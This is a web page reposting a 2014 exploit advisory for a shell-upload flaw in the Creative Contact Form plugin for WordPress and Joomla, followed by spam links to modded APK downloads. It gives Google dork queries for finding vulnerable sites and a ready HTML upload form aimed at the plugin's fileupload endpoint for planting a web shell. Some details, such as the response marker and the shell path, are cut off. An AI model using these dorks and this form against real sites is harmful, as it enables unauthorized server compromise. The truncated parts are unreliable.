Creative Contact Form Shell Upload Vulnerability ( Joomla & WordPress )

#- Title: WordPress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
                  Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
                               creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:”/sexy-contact-form/” (wordpress )
                           inurl:com_creativecontactform ( joomla )
#- Fixed in Version : wp > 0.9.7 Joomla>2.0.0
#- Tested on : Backbox
===================================================
— Proof Of Concept —
When Vuln : {“files”:
CSRF : 
<form method=”POST” action=”http://target. com/components/com_sexycontactform/fileupload/index.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>
Shell Path : Here

 

Tags: #CSRF #Joomla #Wordpress

Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk
Download Pes 2018 Android Release APK terbaru
Download Pes 2018 Android Release APK terbaru
Download FTS Mod PES 2018 APK +
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga APK v0.14.1 Terbaru– Rumah Android
Must read×

Top
error: Content is protected !!